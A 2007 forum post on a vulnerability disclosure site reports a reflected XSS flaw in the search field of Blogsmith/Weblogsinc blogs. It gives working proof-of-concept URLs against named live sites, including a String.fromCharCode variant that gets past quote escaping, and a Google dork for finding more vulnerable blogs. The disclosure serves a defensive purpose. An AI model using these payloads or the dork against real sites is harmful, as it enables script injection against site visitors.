Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Blogsmith (Weblogsinc) XSS
Posted by: digi7al64
Date: January 17, 2007 10:42PM

Reflective XSS exists in all blogsmith and webloginc blogs via the search field which does not filter user input.

POC (no sub domains)
http://www.brianalvey.com/search/?q=%22%3A%3Cscript%3Ealert%28%27moo%27%29%3B%3C%2Fscript%3E
http://www.calacanis.com/search/?q=%22%3A%3Cscript%3Ealert%28%27moo%27%29%3B%3C%2Fscript%3E

POC (sub domains of weblogsinc) [escapes ' so it require string.fromcharcode]
http://spam.weblogsinc.com/search/?q=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C69%2C76%2C76%2C79%29%29%3B%3C%2Fscript%3E

Googledork
http://www.google.com/search?hl=en&q=powered+by+blogsmith&btnG=Google+Search&meta=
Quote

Results 1 - 10 of about 1,520,000

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/17/2007 10:43PM by digi7al64.

Options: ReplyQuote


Sorry, only registered users may post in this forum.